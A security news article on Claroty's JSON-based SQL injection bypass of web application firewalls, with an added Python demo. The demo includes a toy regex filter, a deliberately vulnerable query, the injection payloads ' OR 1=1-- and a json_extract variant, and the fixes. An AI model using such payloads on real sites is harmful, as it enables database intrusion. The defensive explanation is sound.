Researchers Detail New Attack Method to Bypass Popular WebApp Firewalls
A new attack method can be used to circumvent web application firewalls (WAFs) of various vendors and infiltrate systems, potentially enabling attackers to gain access to sensitive business and customer information.

Web application firewalls are an essential line of defense: they filter, monitor, and block HTTP(S) traffic to and from a web application in order to defend against attacks such as cross-site scripting (XSS), file inclusion, and SQL injection.

The generic bypass “involves appending JSON syntax to SQL injection payloads that a WAF is unable to parse,” Claroty researcher Noam Moshe said. “Most WAFs will easily detect SQLi attacks, but prepending JSON to SQL syntax left the WAF blind to these attacks.”

The industrial and IoT cybersecurity company said its technique successfully worked against WAFs from vendors like Amazon Web Services (AWS), Cloudflare, F5, Imperva, and Palo Alto Networks, all of whom have since released updates to support JSON syntax during SQL injection inspection.

Web Application Firewalls

With WAFs acting as a security guardrail against malicious external HTTP(S) traffic, an attacker with capabilities to get past the barrier can obtain initial access to a target environment for further post-exploitation.

The bypass mechanism devised by Claroty relies on the WAFs' lack of JSON support: a WAF that cannot parse JSON operators and functions does not recognise a SQL injection payload that expresses its logic through them, so crafted payloads containing JSON syntax pass the protections while still being valid SQL for the backend database.
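The following is an added illustration of the mechanism, written for this article and not code from Claroty or from any of the vendors named; the "WAF" here is a deliberately simplistic, constructed regex filter, not any vendor's rule set, and the database is an in-memory SQLite table with made-up rows. It shows that a signature-based filter which catches a classic boolean tautology lets through a payload that encodes the same always-true condition via SQLite's `json_extract`, while the backend still evaluates it and dumps every row; it also shows the two fixes, a JSON-aware rule set (the vendor-side fix) and parameterised queries (the application-side fix that makes the WAF result irrelevant).

```python
import re
import sqlite3

# Constructed example rule set: a naive signature "WAF" that only knows
# classic tautologies such as  ' OR 1=1  or  ' OR '1'='1  and UNION SELECT.
LEGACY_RULES = [
    re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+", re.IGNORECASE),
    re.compile(r"\bunion\b\s+\bselect\b", re.IGNORECASE),
]

# Constructed "updated" rule set: the same rules plus awareness of the JSON
# functions/operators a database may evaluate inside a WHERE clause.
JSON_AWARE_RULES = LEGACY_RULES + [
    re.compile(r"\bjson_(extract|value|query|contains)\s*\(", re.IGNORECASE),
    re.compile(r"->>?|@>|::\s*jsonb?", re.IGNORECASE),  # MySQL/Postgres JSON operators
]


def waf_blocks(user_input: str, rules) -> bool:
    """Return True if any signature in `rules` matches the raw input."""
    return any(r.search(user_input) for r in rules)


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)")
    con.executemany(
        "INSERT INTO users (username, secret) VALUES (?, ?)",
        [("alice", "s3cr3t-a"), ("bob", "s3cr3t-b")],
    )
    return con


def vulnerable_lookup(con: sqlite3.Connection, username: str):
    # Deliberately vulnerable: user input concatenated straight into SQL.
    sql = f"SELECT username, secret FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchall()


def safe_lookup(con: sqlite3.Connection, username: str):
    # Hardened form: bound parameter, so the input can never become SQL syntax.
    return con.execute(
        "SELECT username, secret FROM users WHERE username = ?", (username,)
    ).fetchall()


def request(con: sqlite3.Connection, user_input: str, rules, lookup):
    """Simulate a request passing through the WAF and then the application."""
    if waf_blocks(user_input, rules):
        return "blocked"
    return lookup(con, user_input)


# Classic boolean-based payload: the legacy rules catch it.
CLASSIC_PAYLOAD = "' OR 1=1--"

# Same always-true condition, but expressed with a JSON function:
#   json_extract('{"a":1}', '$.a') evaluates to 1 on the database side,
# and nothing in the legacy signatures matches it.
JSON_PAYLOAD = "' OR json_extract('{\"a\":1}','$.a')=1--"


if __name__ == "__main__":
    con = make_db()
    print("classic / legacy WAF :", request(con, CLASSIC_PAYLOAD, LEGACY_RULES, vulnerable_lookup))
    print("json    / legacy WAF :", request(con, JSON_PAYLOAD, LEGACY_RULES, vulnerable_lookup))
    print("json    / updated WAF:", request(con, JSON_PAYLOAD, JSON_AWARE_RULES, vulnerable_lookup))
    print("json    / parameterised query, no WAF:", request(con, JSON_PAYLOAD, [], safe_lookup))
```

The regex rule set is only a stand-in for real WAF logic, but the point carries: whatever is not in the filter's grammar is invisible to it, while the database parses the full dialect. Treat a WAF as defense in depth and keep parameterised queries as the primary control.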

“Attackers using this novel technique could access a backend database and use additional vulnerabilities and exploits to exfiltrate information via either direct access to the server or over the cloud,” Moshe explained. “This is a dangerous bypass, especially as more organizations continue to migrate more business and functionality to the cloud.”
